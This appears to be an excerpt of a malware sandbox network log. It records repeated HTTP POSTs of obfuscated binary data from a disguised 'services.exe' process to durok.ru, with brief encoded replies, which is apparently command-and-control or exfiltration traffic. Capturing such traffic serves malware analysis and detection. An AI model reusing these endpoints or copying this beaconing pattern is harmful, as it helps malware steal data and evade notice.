                                                                                                                              Dec 26, 2024 17:17:37.818181992 CET2548OUTData Raw: 59 50 5e 5c 51 58 59 57 5e 58 52 54 56 51 58 56 54 50 5b 58 56 56 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^\QXYW^XRTVQXVTP[XVVSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'< <="2 Y,>:[08#,(4<"Z:: B?0$^*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:38.645522118 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:38.902192116 CET802INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:38 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5sqiC5HZHyv3o0uZyz5QrnSyGW1k%2FM8Y89mw%2FaWQ7nctG%2B0jhUxvw7QS8WZ2bso1%2BBbBmvavGFHgIvaLip5WKQ%2ByIQ0d%2BTGkTvy9JSQGSID5io3n6gvlKKpsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261d77dda0f99-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4483&min_rtt=1704&rtt_var=6197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=60993&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.449764104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:38.579726934 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:38.927218914 CET2128OUTData Raw: 59 5d 5b 58 54 5a 59 50 5e 58 52 54 56 5c 58 5b 54 51 5b 5b 56 56 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y][XTZYP^XRTV\X[TQ[[VVSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')1<?65;!W*'%3''Y ",.X-*(*"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:17:39.758711100 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:40.014126062 CET949INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:39 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqxY4nWCkfJM84mnRTWNzN3ytViGP5Fox20PgzYAWvi3XsdLLK1w%2Bh1UFgQdbV%2BYypBFJxGW1XZDTY9d1YrY%2B5lx3M9%2FShyx4IdLqkkrTBh67IS%2F7t5NlzzdcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261de7c8c431b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4073&min_rtt=1756&rtt_var=5293&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=71938&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5b 3d 29 2b 51 20 3c 30 54 2b 3d 21 08 3d 21 03 14 28 32 35 5e 28 3c 22 1f 2b 5e 2c 0f 34 39 32 59 2a 2a 24 58 25 18 32 59 32 0b 2e 5c 05 1d 27 5d 2b 3b 3c 5f 24 22 25 58 2a 58 3e 05 3e 58 39 18 33 3f 05 58 37 15 3a 5a 34 1f 3f 05 38 12 2c 10 39 3f 34 12 3f 23 3a 58 23 3d 21 51 0c 1f 38 53 21 2a 2c 02 25 2d 25 57 20 30 3b 56 27 38 22 1e 36 05 3b 54 27 3a 2b 11 26 0d 3c 0b 23 5b 24 0f 3f 04 22 13 31 3f 2a 00 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$[=)+Q <0T+=!=!(25^(<"+^,492Y**$X%2Y2.\']+;<_$"%X*X>>X93?X7:Z4?8,9?4?#:X#=!Q8S!*,%-%W 0;V'8"6;T':+&<#[$?"1?*+)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.449765104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:39.141527891 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:39.536778927 CET2548OUTData Raw: 59 5d 5e 51 54 5e 59 54 5e 58 52 54 56 5d 58 56 54 54 5b 5b 56 53 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^QT^YT^XRTV]XVTT[[VSSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[(W?>)-W6"+;=:>04<"< V#?>[:?(V'+%"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:17:40.319360971 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:40.569905043 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:40 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STNDrYon2EVW27OfSghBQ2qAd54F%2Fci5i%2FDm0Y0SgqqskMPubjO6zqXtcvT4rBDnrG0c37MaaK8CxfPcjXseVkc%2Ftxo7fXqJYAUSraXB1qp6doT6SE3XmKC4Pw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261e1f9d48c1b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4538&min_rtt=1978&rtt_var=5862&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=65004&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.449766104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:40.809346914 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.449767104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:41.205862999 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:41.552483082 CET2128OUTData Raw: 5c 5e 5b 58 54 5d 59 50 5e 58 52 54 56 5a 58 50 54 53 5b 5f 56 50 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^[XT]YP^XRTVZXPTS[_VPS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$\)2#?*=U!/>V?7%$$4 4Z2.)4@>3$_)"Z.#Z**
                                                                                                                              Dec 26, 2024 17:17:42.384809017 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:42.638060093 CET953INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:42 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRHsLM5vGOHf02%2BkUJ%2Fx%2BVSrGma3uDHemO%2BNKvw%2Fro%2BV6bRhd1nLiSORN3vS12bHts3pazXXcLzlFcPfb9s99hlZllRnDiTWM%2FoM0eRgsYpesDmxUkgWchmqWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261eedb884393-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3956&min_rtt=1754&rtt_var=5063&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=75350&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 00 29 29 01 1b 37 05 2c 57 3c 04 3a 52 28 32 25 5c 28 0c 35 59 3f 01 3d 0c 28 28 2c 0a 20 39 29 03 29 14 02 13 26 36 08 1f 32 31 2e 5c 05 1d 27 17 2b 38 3f 07 27 21 29 5f 29 00 32 47 2a 00 13 5f 25 2c 33 58 20 2b 2e 5e 37 21 37 01 2e 3c 3c 59 3a 05 23 03 3c 1e 03 02 22 2d 21 51 0c 1f 38 1c 36 07 02 02 32 00 2a 0c 36 0e 34 0c 32 06 0b 0e 35 38 20 0c 24 14 3b 5c 27 33 28 0e 22 3e 3b 10 3c 3e 2d 01 25 11 0b 58 3d 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'))7,W<:R(2%\(5Y?=((, 9))&621.\'+8?'!)_)2G*_%,3X +.^7!7.<<Y:#<"-!Q862*64258 $;\'3(">;<>-%X=9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.449768104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:41.325777054 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:41.677310944 CET2548OUTData Raw: 59 50 5b 5f 54 5d 59 54 5e 58 52 54 56 58 58 50 54 51 5b 5a 56 57 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP[_T]YT^XRTVXXPTQ[ZVWS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$\?<)62/.=2*790]"?37<.0?Y>"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:42.504190922 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:42.762238979 CET794INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:42 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9nTs%2BiNVCBIOCgelFI0V8UoISSbUUC3plbZ7xeTtWGHWq1wT24TyYlIBaGGUJ5IKde1nu7dvEIaTK5wZZ8%2B1siP2defVf2WXrQsMinFA8nb1HjIAIi7Ywd7TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ef99ec1819-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4633&min_rtt=1702&rtt_var=6501&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=58040&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.449769104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:43.013623953 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:43.369827986 CET2548OUTData Raw: 5c 5b 5e 5b 51 5f 5c 55 5e 58 52 54 56 5a 58 52 54 57 5b 55 56 55 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[^[Q_\U^XRTVZXRTW[UVUSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(1Z+T""<^/5=$3\#??"<..9 <8_)5"Z.#Z**


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.449770104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:43.767446995 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:44.114810944 CET2108OUTData Raw: 59 5d 5b 5b 54 54 59 53 5e 58 52 54 56 5f 58 54 54 54 5b 58 56 56 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y][[TTYS^XRTV_XTTT[XVVS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[+W0Z<)6;/=$>^$$ 7,,P#Z%,:?> =5"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:17:44.947308064 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:45.198000908 CET943INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:45 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LS1NwmDZigcEJ%2BXVuDV4aYk72KvN30wtYM%2BBvwGhZxZ6QUwlqfh3bnYb7cZ0rvL7L7wBDzSsBjIKY12acsYLySK28ZSoekIMltiWtWn16jInSNB0xt2KMOrKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261fededf8c11-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4365&min_rtt=1995&rtt_var=5488&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2439&delivery_rate=69669&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 02 3e 17 23 51 23 2f 30 57 3c 3d 26 56 29 0f 0f 5c 3f 21 35 1a 3f 11 2d 0d 3f 3b 37 1b 23 3a 39 01 29 5c 2c 11 26 25 39 02 26 21 2e 5c 05 1d 27 5d 3f 3b 2c 5e 24 21 2d 13 2a 58 32 43 29 3e 1b 5f 33 3c 3c 01 37 15 3e 5d 34 31 2b 04 2f 5a 37 06 3a 05 37 06 2a 23 3e 58 22 17 21 51 0c 1f 38 54 36 3a 3c 03 26 2e 2d 1f 36 09 34 0f 27 38 36 55 21 05 2f 54 26 3a 33 5c 25 33 06 0d 22 2d 3b 57 3c 04 25 02 32 3f 07 59 2a 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'>#Q#/0W<=&V)\?!5?-?;7#:9)\,&%9&!.\']?;,^$!-*X2C)>_3<<7>]41+/Z7:7*#>X"!Q8T6:<&.-64'86U!/T&:3\%3"-;W<%2?Y*%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.449771104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:43.903995037 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:44.261104107 CET2548OUTData Raw: 5c 59 5b 58 54 55 59 50 5e 58 52 54 56 50 58 5a 54 52 5b 5b 56 57 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y[XTUYP^XRTVPXZTR[[VWSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$]([>).!'/X6='>%''\"/,T#999;> 0Y>5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:44.520920038 CET1236OUTData Raw: 3c 39 07 3a 2a 2b 05 19 3c 27 2d 23 38 24 31 2d 36 08 0a 06 27 5e 23 19 30 0c 25 13 00 06 1b 3a 31 01 26 0e 3d 2e 53 19 37 5d 5e 1c 09 57 3f 21 03 20 3f 03 02 3d 0e 58 36 33 1b 2e 09 3b 51 22 38 31 15 0a 3d 5d 2c 5f 3c 3f 3e 2d 22 21 1e 2c 32 5e
                                                                                                                              Data Ascii: <9:*+<'-#8$1-6'^#0%:1&=.S7]^W?! ?=X63.;Q"81=],_<?>-"!,2^(>*U=8%[Q>=<(<!2&\"0< 4V"&:(1=;/%>_]2$\59)<ZU#:5+ ))6/>4&&&!#< ;X\8Y9;H"2W!0%&#6.<8/Z<14=3?(2
                                                                                                                              Dec 26, 2024 17:17:45.081871033 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:45.338087082 CET793INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:45 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RT%2BpoARvu66YYdqvkHolmFy0Unn0U0UeGS809XHenyFSBcxQXl0uY0CPpBu319E1alkgmqChUNhlmmSbO2wA8Vp3DNfCz254iqLtVmjAAyVaW7Yb8BRIHLf2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ffbeef5e71-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6681&min_rtt=1764&rtt_var=10496&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=35521&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.2.449772104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:45.757461071 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:46.114794016 CET2548OUTData Raw: 59 5b 5e 59 54 54 5c 52 5e 58 52 54 56 5f 58 57 54 50 5b 5e 56 56 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^YTT\R^XRTV_XWTP[^VVSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$(W+<_!#2,X;>-U=^3$$ ,4?&_9)$@< 8="Z.#Z*>
                                                                                                                              Dec 26, 2024 17:17:46.937822104 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:47.189898014 CET805INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:46 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
